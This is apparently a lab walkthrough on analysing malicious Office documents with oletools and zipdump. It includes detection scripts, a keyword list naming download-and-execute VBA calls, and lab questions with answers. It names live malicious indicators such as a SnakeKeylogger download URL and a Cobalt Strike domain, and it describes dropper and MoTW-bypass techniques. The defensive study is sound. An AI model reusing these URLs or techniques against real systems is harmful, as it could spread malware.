# Office Files Analysis

Office documents are a common attack vector because they are widely used and support macros and embedded objects. Analyzing malicious samples shows how these attacks work, which helps in developing effective defenses. Analysis can also reveal the specific tactics, techniques, and procedures (TTPs) used by threat actors, aiding attribution and understanding of the threat landscape.

## Common Attacks Using Malicious Office Files

Malicious Office documents, such as Word or Excel files, are commonly used by attackers to deliver malware. These files may contain malicious macros, embedded objects, or exploit vulnerabilities to execute code, often as part of phishing campaigns. Analyzing them requires a structured approach to uncover the following techniques:

* **Macro-Based Attacks**: Malicious macros run when enabled by the user, often downloading further payloads.
* **Embedded Objects**: Embedded OLE objects or ActiveX controls may execute code without the user's awareness.
* **Exploiting Vulnerabilities**: Crafted documents can exploit flaws in Office applications, such as buffer overflows.
* **Phishing & Social Engineering**: Documents are used to deceive users into enabling macros or clicking malicious links.

## Macros

Macros in Microsoft Office automate repetitive tasks using commands written in Visual Basic for Applications (VBA), a Microsoft-supported language across all Office products.

The default Office Open XML (OOXML) formats `.docx`, `.xlsx`, and `.pptx` cannot store macros. Within OOXML, VBA macros require a macro-enabled format, such as:

* Word: `.docm`, `.dotm`
* Excel: `.xlsm`, `.xltm`
* PowerPoint: `.pptm`, `.potm`

The trailing 'm' in these extensions indicates that the file may contain macros, that is, executable code. Renaming the extension does not remove the macros: if macros are present, a security warning will still state: "Macros have been disabled."

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F91AsK3rwus3Ozd6QZKJ0%2Foffice-4_.webp?alt=media&#x26;token=684b24a3-06c0-4115-b070-44af0818c129" alt=""><figcaption></figcaption></figure>
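Because the extension can be changed, one way to confirm whether a ZIP-based Office file really carries a macro project is to look inside the container for a `vbaProject.bin` part, which is where OOXML formats store VBA. The following is a minimal Python sketch under that assumption. The helper names `has_vba_project` and `build_sample` are hypothetical, the archives are synthetic, and legacy OLE files (`.doc`, `.xls`) are not covered.

```python
import io
import zipfile


def has_vba_project(data: bytes) -> bool:
    """Return True if a ZIP-based Office file contains a vbaProject.bin part."""
    stream = io.BytesIO(data)
    if not zipfile.is_zipfile(stream):
        # Not a ZIP container (e.g. legacy OLE or RTF); out of scope for this sketch.
        return False
    with zipfile.ZipFile(stream) as archive:
        return any(name.lower().endswith("vbaproject.bin") for name in archive.namelist())


def build_sample(members: dict) -> bytes:
    """Build a synthetic in-memory ZIP for demonstration (hypothetical content)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        for name, content in members.items():
            archive.writestr(name, content)
    return buffer.getvalue()


if __name__ == "__main__":
    with_macros = build_sample({"word/document.xml": b"<doc/>", "word/vbaProject.bin": b"\x00"})
    without_macros = build_sample({"word/document.xml": b"<doc/>"})
    print(has_vba_project(with_macros), has_vba_project(without_macros))
```

A check like this only reports that a macro project exists; extracting and reviewing the VBA source still requires a dedicated tool.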

Just as PDF files have a scripting language, Office documents have their own: VBA (Visual Basic for Applications). VBA macros are powerful and can directly call Windows APIs, enabling actions like malware download and code execution. Attackers commonly use macros to:

* **Modify Files**: Change or delete system files.
* **Execute Code**: Run malicious scripts or binaries.
* **Deliver Payloads**: Fetch and launch malware from remote sources.

Analyzing macros is essential, as they are a common attack vector.

The easiest way to detect macros in an Office file is to run the `oleid.py` Python utility against the document:

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oleid.py C:\Tools\MalDoc\Office\Demo\Samples\QuasarRAT\QuasarRAT.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FPjY3ZD6Gt3VoskeSkvMf%2FScreenshot(36).png?alt=media&#x26;token=a09c854d-56fc-40dc-a464-f314babfeb87" alt=""><figcaption></figcaption></figure>

## Office File Formats

Office documents can be saved in various formats, with the most common being:

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FFbrTTX7JBxZGfBQc5EHV%2Foffice-files.webp?alt=media&#x26;token=fe60bebf-b817-4b48-bfa7-4c8132f8b4d9" alt=""><figcaption></figcaption></figure>

The `oledir.py` Python script displays the directory layout of an OLE file:

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oledir.py C:\Tools\MalDoc\Office\Demo\Samples\Havoc\3dfddb91261f5565596e3f014f9c495a.doc
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FKUiUdas2SJOPnp9QIGYf%2FScreenshot(37).png?alt=media&#x26;token=f4d8141f-1be0-46ab-807a-58455bb4a131" alt=""><figcaption></figcaption></figure>

RTF files do not support macros, but they can still be used in attacks through embedded objects (such as OLE1 objects), binary content, or exploits targeting vulnerabilities in RTF parsers.

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oleid.py C:\Tools\MalDoc\Office\Demo\Samples\xworm\sample.rtf
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fyh3ql6DAS7gRq5sVzBKx%2FScreenshot(38).png?alt=media&#x26;token=41c71007-2925-4f77-982a-87c9107bc9ee" alt=""><figcaption></figcaption></figure>

For a more detailed analysis, we will use the `rtfdump.py` Python utility, which can be downloaded from the official GitHub [repository](https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py). Inside the target VM, it can be run from the following path:

```bash
python C:\Tools\MalDoc\Office\Tools\DidierStevensSuite\rtfdump.py C:\Tools\Maldoc\Office\Demo\Samples\xworm\sample.rtf
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FcREVAk4Ez9xQsxLWguMN%2FScreenshot(39).png?alt=media&#x26;token=0c56ce07-f4ef-4556-9f3c-e0801239e3e1" alt=""><figcaption></figcaption></figure>
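To illustrate what "embedded objects" look like at the byte level, the following rough Python sketch counts a few object-related RTF control words in raw data. The control-word list, the function name `count_object_markers`, and the sample fragment are assumptions chosen for illustration; this is not how `rtfdump.py` or `oleid.py` work internally, and real samples often obfuscate these markers.

```python
import re

# A few RTF control words associated with embedded objects. The list is an
# illustrative assumption, not the set of checks rtfdump.py or oleid.py perform.
OBJECT_CONTROL_WORDS = ("object", "objemb", "objdata", "objupdate", "objautlink")


def count_object_markers(rtf_bytes: bytes) -> dict:
    """Count occurrences of each object-related control word in raw RTF bytes."""
    counts = {}
    for word in OBJECT_CONTROL_WORDS:
        # A control word is a backslash plus letters; the negative lookahead
        # stops "\object" from also matching a longer word that starts the same.
        pattern = re.compile(rb"\\" + word.encode("ascii") + rb"(?![A-Za-z])")
        hits = len(pattern.findall(rtf_bytes))
        if hits:
            counts[word] = hits
    return counts


# Synthetic RTF fragment (hypothetical content, not taken from the sample).
SAMPLE_RTF = rb"{\rtf1{\object\objemb\objupdate{\*\objdata 0105000002000000}}}"

if __name__ == "__main__":
    print(count_object_markers(SAMPLE_RTF))
```

A non-empty result is only a hint that the file deserves a closer look with a purpose-built RTF parser.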

## Questions

Q1) Run `olevba.py` with `-a` option on the file "C:\Tools\MalDoc\Office\Demo\Samples\QuasarRAT\QuasarRAT.docx". This will show a list of suspicious keywords. Figure out the keyword that downloads files from the Internet. Type the keyword as your answer. Answer Format is m\*\*\*\*\*\*\*\*.\*\*\*\*\*\*\*

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\olevba.py -a C:\Tools\MalDoc\Office\Demo\Samples\QuasarRAT\QuasarRAT.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F6ulqgPAP5Klz7S8N8zBV%2FScreenshot(40).png?alt=media&#x26;token=1468163b-4bca-49c4-9382-9d3ad1977211" alt=""><figcaption></figcaption></figure>

Answer: `microsoft.xmlhttp`

## Office Document - VBA Macro Analysis

Let's start with the MS Office document formats by reviewing the Word file types that we know.

| File Type     | Description                                       |
| ------------- | ------------------------------------------------- |
| doc           | Microsoft Word document before Word 2007          |
| docm          | Microsoft Word macro-enabled document             |
| docx          | Microsoft Word document (Open XML, current format) |
| dot/dotx/dotm | Word template files                               |

When the type of a file is unknown, we can extract basic information about the sample using `trid.exe`, which reports what kind of file we are dealing with.

```bash
trid C:\Tools\MalDoc\Office\Demo\Samples\Havoc\3dfddb91261f5565596e3f014f9c495a.doc
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FS8DsP6qu1FqN0nT7B3na%2FScreenshot(41).png?alt=media&#x26;token=bac975fb-3537-4b07-92cc-ecd5711c2bb7" alt=""><figcaption></figcaption></figure>
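TrID matches a file against a large signature database. As a much smaller illustration of the same idea, the sketch below checks only three well-known leading byte patterns relevant to Office documents. The function name `sniff_office_container` and the returned labels are hypothetical, and the check says nothing about whether a file is malicious.

```python
# Leading bytes of an OLE2 compound file (legacy .doc/.xls/.ppt).
OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")
# Local file header signature of a ZIP archive (OOXML files are ZIP containers).
ZIP_MAGIC = b"PK\x03\x04"
# RTF files normally start with "{\rtf1"; only the "{\rt" prefix is checked here
# because malformed headers are commonly reported in malicious samples.
RTF_PREFIX = b"{\\rt"


def sniff_office_container(header: bytes) -> str:
    """Classify a file by its first bytes: 'ole2', 'zip', 'rtf', or 'unknown'."""
    if header.startswith(OLE2_MAGIC):
        return "ole2"
    if header.startswith(ZIP_MAGIC):
        return "zip"
    if header.lstrip().startswith(RTF_PREFIX):
        return "rtf"
    return "unknown"


if __name__ == "__main__":
    print(sniff_office_container(OLE2_MAGIC + b"\x00" * 8))
    print(sniff_office_container(b"PK\x03\x04rest-of-archive"))
    print(sniff_office_container(b"{\\rtf1\\ansi}"))
```

To apply it to a file on disk, read the first few bytes (for example `open(path, "rb").read(16)`) and pass them in.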

The output indicates that it is a DOC file and that it also contains an OLE object. We can use `olemeta.py`, a script that parses OLE files such as MS Office documents (e.g., Word, Excel) and extracts all standard properties present in the OLE file.

```bash
python c:\tools\maldoc\office\tools\oletools\olemeta.py  C:\Tools\MalDoc\Office\Demo\Samples\Havoc\3dfddb91261f5565596e3f014f9c495a.doc
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FbG9fTbQbtPerrx2nc9AD%2FScreenshot(42).png?alt=media&#x26;token=40917ac3-81e6-4c47-8e46-150a50453729" alt=""><figcaption></figcaption></figure>

To get the timestamp information, we can use the `oletimes.py` Python script:

```bash
python C:\tools\maldoc\office\tools\oletools\oletimes.py  C:\Tools\MalDoc\Office\Demo\Samples\Havoc\3dfddb91261f5565596e3f014f9c495a.doc
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FQaw5zO5WJ3OUJ7y7SksI%2FScreenshot(44).png?alt=media&#x26;token=49194d03-0369-47e1-911e-e1b80cc16056" alt=""><figcaption></figcaption></figure>

Next, we can use `oleid.py` to get more information related to the sample.

```bash
python C:\tools\maldoc\office\tools\oletools\oleid.py C:\Tools\MalDoc\Office\Demo\Samples\Havoc\3dfddb91261f5565596e3f014f9c495a.doc
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FpqOIX4UThJyksZ3V0TOV%2FScreenshot(45).png?alt=media&#x26;token=8bf85663-8437-4ba9-b407-2f72384edfc1" alt=""><figcaption></figcaption></figure>

The output shows that `VBA macros` are present. Let's confirm this with the `olevba` utility, which opens an MS Office file, detects whether it contains VBA macros, and extracts and analyzes the VBA source code. It can also be used as a library from your own Python applications.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FQaTAsXUTaGtbMSE2XL9n%2FScreenshot(46).png?alt=media&#x26;token=5fe1cadc-c619-4c71-837a-c1965613844a" alt=""><figcaption></figcaption></figure>

## Questions

Q1) Use `olemeta.py` to analyze the document properties. Find out who the author of this document is, and type the author's name as your answer.

```bash
python c:\tools\maldoc\office\tools\oletools\olemeta.py  C:\Tools\MalDoc\Office\Demo\Samples\Havoc\3dfddb91261f5565596e3f014f9c495a.doc
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F64OZhHVzVzN6qV2pVE1T%2FScreenshot(6).png?alt=media&#x26;token=721af9a2-62f8-42be-a9fe-fb3063ad4a71" alt=""><figcaption></figcaption></figure>

Answer:  `Mohammed Alkuwari`

## Obfuscated VBA Macro Analysis

In this section, we'll analyze another sample that is a little more complicated: a heavily obfuscated malicious document that drops `QuasarRAT` malware on the system. The sample, renamed to [QuasarRAT.docx](https://www.virustotal.com/gui/file/ba3324366a76daea76cb9a0d78c5367085091ec5efa75eb41120d66cee286881/detection), is tagged under the malware family (signature) `QuasarRAT`, `xRAT`. The details related to this sample are as follows:

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oleid.py C:\Tools\MalDoc\Office\Demo\Samples\QuasarRAT\QuasarRAT.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F8vmvCUSLQmzKdxj7SvKU%2FScreenshot(7).png?alt=media&#x26;token=2ae0b905-afc6-4aa4-be72-eef9a4e9db36" alt=""><figcaption></figcaption></figure>

Next, we can run the `olevba` Python utility to extract more details related to the macro in the document.

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\olevba.py C:\Tools\MalDoc\Office\Demo\Samples\QuasarRAT\QuasarRAT.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FzrWjyAZFtcsFyq7OsH64%2FScreenshot(8).png?alt=media&#x26;token=0bd12144-883a-4252-b402-771d569ad927" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F7tenVKU3K4RcH0Oy3x10%2FScreenshot(10).png?alt=media&#x26;token=0ce56c3f-3613-4939-943f-93ed468b34cd" alt=""><figcaption></figcaption></figure>

olevba flags an `AutoExec` keyword, which indicates a macro that triggers code execution automatically when a user opens the document.

Despite the obfuscation, the script's use of VBA functions like `CreateObject`, `Open`, `Write`, and `SaveToFile` reveals its role as a dropper: it downloads a QuasarRAT payload from an external source, writes it to disk, and executes it.
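The idea of spotting a dropper by its API usage can be sketched as a simple keyword scan over extracted VBA source. This is a simplified illustration, not olevba's actual detection logic. The keyword table, its notes, the function name `flag_keywords`, and the sample macro are all assumptions made for the example.

```python
import re

# Keyword -> short note. The notes are illustrative, not olevba's own wording.
SUSPICIOUS_KEYWORDS = {
    "AutoOpen": "runs automatically when the document is opened",
    "CreateObject": "instantiates a COM object",
    "Microsoft.XMLHTTP": "COM object that can issue HTTP requests",
    "SaveToFile": "writes a stream to disk",
    "Shell": "can launch an executable or command",
}


def flag_keywords(vba_source: str) -> list:
    """Return (keyword, note) pairs for every keyword found, case-insensitively."""
    hits = []
    for keyword, note in SUSPICIOUS_KEYWORDS.items():
        if re.search(r"\b" + re.escape(keyword) + r"\b", vba_source, re.IGNORECASE):
            hits.append((keyword, note))
    return hits


# Hypothetical, non-obfuscated macro used only to exercise the scan.
SAMPLE_MACRO = '''
Sub AutoOpen()
    Set http = CreateObject("Microsoft.XMLHTTP")
    http.Open "GET", "http://example.invalid/payload.bin", False
    http.Send
    Set stream = CreateObject("ADODB.Stream")
    stream.Open
    stream.Write http.responseBody
    stream.SaveToFile "payload.bin", 2
End Sub
'''

if __name__ == "__main__":
    for keyword, note in flag_keywords(SAMPLE_MACRO):
        print(f"{keyword}: {note}")
```

Plain string matching like this is easily defeated by string splitting or encoding, which is why heavily obfuscated samples need deobfuscation before such a scan is meaningful.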

## Questions

Q1) When you extract VBA Macro code of this sample using olevba.py, there is a call to MsgBox. What is the content of this MsgBox function? Type it as your answer.

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\olevba.py C:\Tools\MalDoc\Office\Demo\Samples\QuasarRAT\QuasarRAT.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Ff1eBzeFzp7g14pv2HSov%2FScreenshot(11).png?alt=media&#x26;token=b588c75e-c2bf-411e-8314-b04be15a84ef" alt=""><figcaption></figcaption></figure>

Answer: `Open this Transaction Recipt Again!`

## Analysis of External Relationships

Adversaries have exploited remote code execution vulnerabilities in Office documents, such as `CVE-2021-40444`, which leveraged a malicious ActiveX control in MSHTML to deliver Cobalt Strike Beacon loaders linked to ransomware campaigns. This section explores such malicious Office document tactics.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FjHiwOdwfCkPheKdByVr4%2Fmshtml-flow.webp?alt=media&#x26;token=137526ae-f49c-4f9c-aa6d-69e557beba9a" alt=""><figcaption></figcaption></figure>

Microsoft states that files from external sources are usually tagged with a Mark of the Web (`MoTW`), which triggers Protected View and requires user action to enable active content. However, this document bypasses that protection and executes its payload automatically upon opening, without MoTW or user interaction.

This vulnerability is triggered simply by opening a document; no user interaction, such as clicking 'Enable Content', is required. It can also impact other MSHTML-based applications like Skype, Outlook, and Visual Studio.
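On NTFS, the Mark of the Web is stored in an alternate data stream named `Zone.Identifier`, whose content is a small INI-style text with a `ZoneId` value (3 means the Internet zone). The sketch below parses such text to show what analysts look for when checking whether a sample carried MoTW. The function name `parse_zone_id` and the sample text are hypothetical; reading the stream itself works only on Windows with NTFS and is left as a comment.

```python
import configparser

# Standard Windows security zone identifiers.
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}


def parse_zone_id(zone_identifier_text: str):
    """Return the ZoneId from Zone.Identifier text, or None if it is absent."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep option names case-sensitive ("ZoneId")
    parser.read_string(zone_identifier_text)
    if not parser.has_section("ZoneTransfer"):
        return None
    return parser.getint("ZoneTransfer", "ZoneId", fallback=None)


# Hypothetical stream content for a file downloaded from the Internet.
# On Windows/NTFS the real text could be read with:
#   open(path + ":Zone.Identifier", encoding="utf-8", errors="replace").read()
SAMPLE_STREAM = "[ZoneTransfer]\nZoneId=3\nHostUrl=https://example.invalid/file.docx\n"

if __name__ == "__main__":
    zone = parse_zone_id(SAMPLE_STREAM)
    print(zone, ZONE_NAMES.get(zone, "unknown"))
```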

Let's begin our analysis by examining the `App-description.docx` document and scrutinizing the output from `oleid.py`.

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oleid.py C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F5drqKxEnyz7GPXg0neHK%2FScreenshot(12).png?alt=media&#x26;token=a44d7670-9999-49a0-b4ba-737425bbd605" alt=""><figcaption></figcaption></figure>

As the `oleid.py` output in the screenshot above suggests, we can use `oleobj.py` to obtain the external relationship directly:

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oleobj.py C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FNsQmq0KTg7IjwEu0zRuP%2FScreenshot(13).png?alt=media&#x26;token=e26bc97e-408b-4631-924d-431124568071" alt=""><figcaption></figcaption></figure>

`oleobj.py` quickly surfaces the external relationship and the details of the `suspicious URL`. However, we should also understand the whole process: where the relationship is stored and how to extract it with other useful tools and scripts, starting with `zipdump.py`.

```bash
python zipdump.py C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FC00BeCE8maHNXrESSgnQ%2FScreenshot(14).png?alt=media&#x26;token=5c56a31f-9cb5-47fd-9310-a3bfaf9ae824" alt=""><figcaption></figcaption></figure>

Zipdump's `--dumpall` option dumps the content of every file in the archive. This is useful because the combined output can then be searched.

```powershell
python zipdump.py C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx --dumpall
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FliZY4ERoSqau8ArA5OMw%2FScreenshot(15).png?alt=media&#x26;token=e90a2f84-436b-4a03-9f33-4418c0594e96" alt=""><figcaption></figcaption></figure>

The content reveals a wealth of information. To identify specific patterns, we'll use the `re-search.py` script, which applies regular expressions to search files. It supports both custom regular expressions and predefined patterns from a built-in library; with the `--name` option, the `regex` argument is interpreted as the name of a library pattern (here, `url`).

```bash
python zipdump.py C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx --dumpall | python re-search.py --name url
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FTm2JCCBUr0SlcxGDSfKg%2FScreenshot(16).png?alt=media&#x26;token=39474124-08a8-4951-b246-9a0272c9c37f" alt=""><figcaption></figcaption></figure>

At the end of the output, there's a match for an external URL that is suspicious.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FtpijPVhDxj3kiUdTXrjy%2FScreenshot(17).png?alt=media&#x26;token=89822f21-f029-457a-88d4-ad894c747cb6" alt=""><figcaption></figcaption></figure>
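The dump-and-search pipeline above can be approximated in a few lines of Python: read every member of the ZIP container and apply a URL regex to its bytes. This is a loose sketch, not a reimplementation of `zipdump.py` or `re-search.py`. The regex, the list of ignored namespace hosts, the helper names, and the synthetic archive are all assumptions.

```python
import io
import re
import zipfile

URL_PATTERN = re.compile(rb"https?://[^\s\"'<>]+")

# Hosts that appear in most OOXML files as XML namespace identifiers.
# Ignoring them is an assumption made to reduce noise in this sketch.
NAMESPACE_HOSTS = (b"schemas.openxmlformats.org", b"schemas.microsoft.com", b"www.w3.org", b"purl.org")


def urls_by_member(data: bytes) -> dict:
    """Map each ZIP member name to the sorted non-namespace URLs found in it."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for name in archive.namelist():
            urls = {
                url.decode("latin-1")
                for url in URL_PATTERN.findall(archive.read(name))
                if not any(host in url for host in NAMESPACE_HOSTS)
            }
            if urls:
                results[name] = sorted(urls)
    return results


def build_sample() -> bytes:
    """Build a synthetic archive (hypothetical content, not the real sample)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("word/document.xml", b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        archive.writestr("word/_rels/document.xml.rels", b'<Relationship Target="http://example.invalid/payload.html" TargetMode="External"/>')
    return buffer.getvalue()


if __name__ == "__main__":
    print(urls_by_member(build_sample()))
```

Grouping matches by member name also answers the follow-up question of which file inside the archive contains the suspicious URL.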

We can also perform a [YARA](https://yara.readthedocs.io/en/latest/) search across the whole document. YARA, a name usually expanded as "YARA: Another Recursive Acronym" or "Yet Another Ridiculous Acronym," is an open-source pattern-matching Swiss army knife that identifies patterns within files, making it a powerful tool for malware detection.

Zipdump supports the functionality to perform searches using YARA rules with files, directories, and direct strings as well. We'll use the YARA string search option to search for this domain using `--yara "#s#pawevi.com"`. This should tell us which file contains this suspicious string.

```bash
python zipdump.py --yara "#s#pawevi.com" C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fyp2t3M308iTFMahrrNn5%2FScreenshot(18).png?alt=media&#x26;token=e918b71e-080a-4bda-b06d-2d112ba0090a" alt=""><figcaption></figcaption></figure>

The output shows that this string is present in the relationships file with index 18. Let's open this file using `--select 18` along with the `--dumpall` option (or `-d`/`--dump` for a single selected file) to show its content.

```bash
python zipdump.py --select 18 --dumpall C:\Tools\MalDoc\Office\Demo\Samples\Cobalt-Strike\App-description.docx | python xmldump.py pretty
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FBXsPnVEX73N3azp2CUUO%2FScreenshot(20).png?alt=media&#x26;token=298a472b-4cfc-4dc4-aa5c-cf4cdd994e28" alt=""><figcaption></figcaption></figure>
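The same information can be pulled out programmatically by parsing every `.rels` part in the container and keeping the relationships marked `TargetMode="External"`. The following is a minimal sketch using only the standard library. The function names and the synthetic relationship (including its `example.invalid` target) are hypothetical, and a hardened XML parser would be preferable for untrusted samples.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# XML namespace used by OOXML package relationship parts.
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_relationships(data: bytes) -> list:
    """Return (part name, relationship type, target) for each external relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for name in archive.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(archive.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    # Keep only the last path segment of the type URI, e.g. "oleObject".
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((name, rel_type, rel.get("Target")))
    return findings


# Synthetic relationships part (hypothetical content, not the real sample).
RELS_XML = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    b'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    b'<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
    b'Target="http://example.invalid/payload.html" TargetMode="External"/>'
    b"</Relationships>"
)


def build_sample() -> bytes:
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("word/_rels/document.xml.rels", RELS_XML)
    return buffer.getvalue()


if __name__ == "__main__":
    for finding in external_relationships(build_sample()):
        print(finding)
```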

## Questions

Q1) Locate the sample "C:\Tools\MalDoc\Office\Demo\Samples\SnakeKeylogger\PO026037.docx" and investigate relationships with external links. Type the external link as your answer. Answer format is an HTTP URL.

```bash
python C:\Tools\MalDoc\Office\Tools\oletools\oleobj.py C:\Tools\MalDoc\Office\Demo\Samples\SnakeKeylogger\PO026037.docx
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FsdXFv4fyEOq3Ql3apP9P%2FScreenshot(21).png?alt=media&#x26;token=bbb767d3-4763-47e9-a075-d26ba7a8a6ee" alt=""><figcaption></figcaption></figure>

Answer:  `http://gurl.pro/u8-drp`

